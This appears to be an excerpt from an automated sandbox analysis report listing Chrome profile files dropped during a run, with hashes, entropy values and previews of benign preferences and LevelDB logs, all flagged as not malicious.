                                                                                                                                                                                                                        MD5:F9C39D7E41325D947A46E9BE87DE76FD
                                                                                                                                                                                                                        SHA1:637D0168B36F841F87D249631C3C7662F762473B
                                                                                                                                                                                                                        SHA-256:CB9848B38DD5279CFCC29F5EB5E82BF472163435C3209283D659D6D03CACBDF6
                                                                                                                                                                                                                        SHA-512:39C3A852E301AC151A65498C40181BDEDA3A4CCFA4F9A1BF709DB00603C54885EECB384945B746B3D71CFE627935F7EA321CB625AE2F48197DF2F35399193558
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:10:19.325 187c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/12/06-19:10:19.326 187c Recovering log #3.2021/12/06-19:10:19.327 187c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\afe570b4-d68a-48b3-906a-80551884b651.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4871
                                                                                                                                                                                                                        Entropy (8bit):4.96374295872605
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YciUkPkTiHj5c3WbEEqAOqqTlYqlQKHoTw0amH3CH3G/s8C1Nfct/9BhUJo3Khm8:n6A3/pt9pcKI5ok0JCKL8ibOTQVuwn
                                                                                                                                                                                                                        MD5:8DBC99D2A9E830480F8803B2FC4402BC
                                                                                                                                                                                                                        SHA1:84A99F5EB43D12F33D8FE0ACD0053C32721BA515
                                                                                                                                                                                                                        SHA-256:489351082DA1973C3829B6DD02EC74D218A78C3450F55F0204963A46FCC6B6C0
                                                                                                                                                                                                                        SHA-512:4799D3E8B3825D7DCEAFBCDCAF5C96EA2ED82C7D774BDB6380502809196C49A5535A4B52350BD51958ECD7B2FEF7666239F4D054E84008DDADC3AB486C1A675D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\b0541fc4-450c-49c2-9434-f694e6fbb15b.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15601
                                                                                                                                                                                                                        Entropy (8bit):5.603196901480548
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rUv6hO4B0:TLl9i1kXqKf/pUZNCgVLH2HfgrUvIOJ
                                                                                                                                                                                                                        MD5:97ABBEFBFD124D80BB39B643FD4F2BE3
                                                                                                                                                                                                                        SHA1:F40A5119D6272F27074A48BD3C4436B5985B7DC3
                                                                                                                                                                                                                        SHA-256:626E68C4F0F13218D8EE29EB8F00668595D1D759313A0B714C3072BBEFE10FA2
                                                                                                                                                                                                                        SHA-512:DFE0CD43908BEE905E89531BB1E7D3DA7BDE2A31CCA2FCFE401489A3F48034409631481F2C743ABA54CF719FA35C98C44410B6366866781E7942523FE66EA986
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\c0ca93c8-b969-4ca1-a409-af5f66935290.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):2083
                                                                                                                                                                                                                        Entropy (8bit):4.900523861620045
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:Y2TtwCXGDH3qz5sL9KGs0RLsUSsBvrqXsEMH7snMHjDYhbD:JTOCXGDHazi9K2LjrGGeGwhH
                                                                                                                                                                                                                        MD5:71C6DA154986CFFE2027ACFF96928DA5
                                                                                                                                                                                                                        SHA1:F2CB74BCA5322D39CE745289F58D90D5D008BD4E
                                                                                                                                                                                                                        SHA-256:19F4F3040934E9EA944D006288ED046973A414B754D270479BBB12FB0B0BD831
                                                                                                                                                                                                                        SHA-512:6DDBBC8EC02DCF16EA8E37A0E40FE5A6A2103153BA1123ED96ABB01BF59C6FFBDE4BF0BFD54095E33B710DCA47557BC2ADB27C8EE475C0BA155B22CC33A8B7C9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13285912131531273","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com"},{"alternative_service":[{"advertised_versions":[50],"expiration":"13285912131555730","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://accounts.google.com","supports_spdy":true},{
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\c1a4e162-0f34-498c-9cda-797eccca8e85.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):21244
                                                                                                                                                                                                                        Entropy (8bit):5.552044581640642
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rULHGqnTM6zvO4kyK:TLl9i1kXqKf/pUZNCgVLH2HfgrUbGqnI
                                                                                                                                                                                                                        MD5:B040EF7F2EC00997C30F14B28FA73FDD
                                                                                                                                                                                                                        SHA1:9F52CFCE8C275F9275DF204CCDC7C6642E5F576F
                                                                                                                                                                                                                        SHA-256:853303EEAF0981B8AFF4388B6132F71D4043CE46B002D0564E18B5DE0CC0F730
                                                                                                                                                                                                                        SHA-512:849D7BA46B176AB2F012E57A47B4D1E7E14682D49D0B1F160BFE35CAD594644793344713B6AD764A5C2B1363C6B462E01DC42F50AE5DB524F51478B9D88B7D13
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ce189d4f-950f-45db-8bbb-c6c78a61b9a6.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\d79ff584-f405-453e-ba88-df68519d04c2.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4219
                                                                                                                                                                                                                        Entropy (8bit):4.871684703914691
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
                                                                                                                                                                                                                        MD5:EDC4A4E22003A711AEF67FAED28DB603
                                                                                                                                                                                                                        SHA1:977E551B9ED5F60D018C030B0B4AA2E33B954556
                                                                                                                                                                                                                        SHA-256:DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
                                                                                                                                                                                                                        SHA-512:84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\d9a839b6-4ae3-4634-8498-5b329fcc1852.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17691
                                                                                                                                                                                                                        Entropy (8bit):5.587903684981469
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rULHGn6zhO49:TLl9i1kXqKf/pUZNCgVLH2HfgrUbGnk7
                                                                                                                                                                                                                        MD5:17FB514C5D9118D9D82C756EDC552434
                                                                                                                                                                                                                        SHA1:32B432BCCFF90AEAFD84BF96ECEEFFB05F94E585
                                                                                                                                                                                                                        SHA-256:535F48D3E5C20335C247AB335771EF1231D04758B751A2D8C8D6C4F93CD85581
                                                                                                                                                                                                                        SHA-512:BAFE3033F2F41DA3EBD6F3A4631BA0D7ABF4AFB1436FEB73FAE83D8516D698F94CD00D31968EBF1ECE413967465DA0A1C168A219BAEAC75C531EC0EE0F49D129
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                                                                                        MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                                                                                        SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                                                                                        SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                                                                                        SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: MANIFEST-000004.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                                                                                        MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                                                                                        SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                                                                                        SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                                                                                        SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: MANIFEST-000004.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):139
                                                                                                                                                                                                                        Entropy (8bit):4.601032299105731
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:tUKclVdyFTpgZmwv2JlVdxUFtSO0V8tJlVdxVu2l0WGv:mBPdyFdgZmw2PdSD0VWPdHZ0tv
                                                                                                                                                                                                                        MD5:EA8D8C38C5AC550FE996BE374BAA55D0
                                                                                                                                                                                                                        SHA1:20D352807FCE0082C4632D9C949C74A67E470FA1
                                                                                                                                                                                                                        SHA-256:CA1482D6159A1C71217A16749AA577585B6397C6DD87423A9DD913297CBFFEE4
                                                                                                                                                                                                                        SHA-512:9108B9339007D625373877E18E972A83755D886DEC34C88314F0B2433CEDD5F12388EC61A010D8BFACFBCEC9ABB84C021C05F15CB87304A064BE2342D2E5771B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:54.415 1e6c Recovering log #3.2021/12/06-19:08:54.736 1e6c Delete type=0 #3.2021/12/06-19:08:54.737 1e6c Delete type=3 #2.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):139
                                                                                                                                                                                                                        Entropy (8bit):4.601032299105731
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:tUKclVdyFTpgZmwv2JlVdxUFtSO0V8tJlVdxVu2l0WGv:mBPdyFdgZmw2PdSD0VWPdHZ0tv
                                                                                                                                                                                                                        MD5:EA8D8C38C5AC550FE996BE374BAA55D0
                                                                                                                                                                                                                        SHA1:20D352807FCE0082C4632D9C949C74A67E470FA1
                                                                                                                                                                                                                        SHA-256:CA1482D6159A1C71217A16749AA577585B6397C6DD87423A9DD913297CBFFEE4
                                                                                                                                                                                                                        SHA-512:9108B9339007D625373877E18E972A83755D886DEC34C88314F0B2433CEDD5F12388EC61A010D8BFACFBCEC9ABB84C021C05F15CB87304A064BE2342D2E5771B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:54.415 1e6c Recovering log #3.2021/12/06-19:08:54.736 1e6c Delete type=0 #3.2021/12/06-19:08:54.737 1e6c Delete type=3 #2.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MPEG-4 LOAS
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50
                                                                                                                                                                                                                        Entropy (8bit):5.028758439731456
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Ukk/vxQRDKIVmt+8jzn:oO7t8n
                                                                                                                                                                                                                        MD5:031D6D1E28FE41A9BDCBD8A21DA92DF1
                                                                                                                                                                                                                        SHA1:38CEE81CB035A60A23D6E045E5D72116F2A58683
                                                                                                                                                                                                                        SHA-256:B51BC53F3C43A5B800A723623C4E56A836367D6E2787C57D71184DF5D24151DA
                                                                                                                                                                                                                        SHA-512:E994CD3A8EE3E3CF6304C33DF5B7D6CC8207E0C08D568925AFA9D46D42F6F1A5BDD7261F0FD1FCDF4DF1A173EF4E159EE1DE8125E54EFEE488A1220CE85AF904
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: V........leveldb.BytewiseComparator...#...........
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f9237338-49ec-4c60-a5ab-90248559707a.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4844
                                                                                                                                                                                                                        Entropy (8bit):4.9581664102636305
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YciUkPkTiHj5c39EqAOqqTlYqlQKHoTw0amH3CH3G/s8C1Nfct/9BhUJo3KhmeSz:n6A39pt9pcKI5ok0JCKL8VbOTQVuwn
                                                                                                                                                                                                                        MD5:BD94BBEA2439066F1FD0EB66BE4E90A9
                                                                                                                                                                                                                        SHA1:B7096CEBADC6D72C12556E4C0C5E1563AF45740C
                                                                                                                                                                                                                        SHA-256:F44C94FA5D239A85AA654E870BB3787B5C7D66342F17F05BBD53F6703407E53C
                                                                                                                                                                                                                        SHA-512:DB14EC4D83275FCAFB0CC5160C1CBFD618A37D01BC43F5CD8FC9B7ACEA5153954B61B91C7547F158BC82790AB2C5A913D1018F7396BDA0AFED23DFE73F5ACC8D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f9ab98df-ef42-4389-b2c9-946baa25ce5e.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17690
                                                                                                                                                                                                                        Entropy (8bit):5.587825848598147
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rULHG46fO4J:TLl9i1kXqKf/pUZNCgVLH2HfgrUbG4mz
                                                                                                                                                                                                                        MD5:8CCF846D429115E4B5B6A9DC8D365FC6
                                                                                                                                                                                                                        SHA1:6B1656E1FEC83852BB8CD649AAFF04AA28651ED1
                                                                                                                                                                                                                        SHA-256:2D6F6D4974231A16917A5921B2FBFAC94C25BBF38BBA5C3AFADD0E6C3453369C
                                                                                                                                                                                                                        SHA-512:BC1F1F4F64F4F8BB007B61D88F6805445B133FAE79A9740E1DC20772054509BB89CF70E89962ED4C91D7B903B3618377261417B1318E134B0CC45E43C5CCA403
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ffcd03a3-b197-4daa-b9ee-f3cc93fa57ab.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5467
                                                                                                                                                                                                                        Entropy (8bit):5.186977647949688
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:n6A3kpt9Uz0aScKI5ok0JCKL8ibOTQVuwn:n6xH9UwcO4Kf
                                                                                                                                                                                                                        MD5:B5E0AF68004C8ABAFC6802C2DFC85C25
                                                                                                                                                                                                                        SHA1:6FAB370712F0A7531781E74E3FC101BDF4C4387E
                                                                                                                                                                                                                        SHA-256:5503C11BDC411307B4290160BE95B68192437F7B95D6F8A022366D476786BD37
                                                                                                                                                                                                                        SHA-512:307878330359C8B528FD5674FB99D6F27E7A1478D86B42CAFC1C879BC2BD90C066BCB02138ED2A40D448906201CA92EFD2844DAEDD27C57B17D1B07D65C5ACD0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                        Entropy (8bit):5.2278007006470455
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxYo+q2PWXp+N23iKKdKfrzAdIFUtAPdxumWZmw2PdxPVkwOWXp+N23iKKdKS:uP5+va5Kk9FUtAPa/2PfV5f5Kk2J
                                                                                                                                                                                                                        MD5:71050F4520CC6F020D528D6E879B6EE9
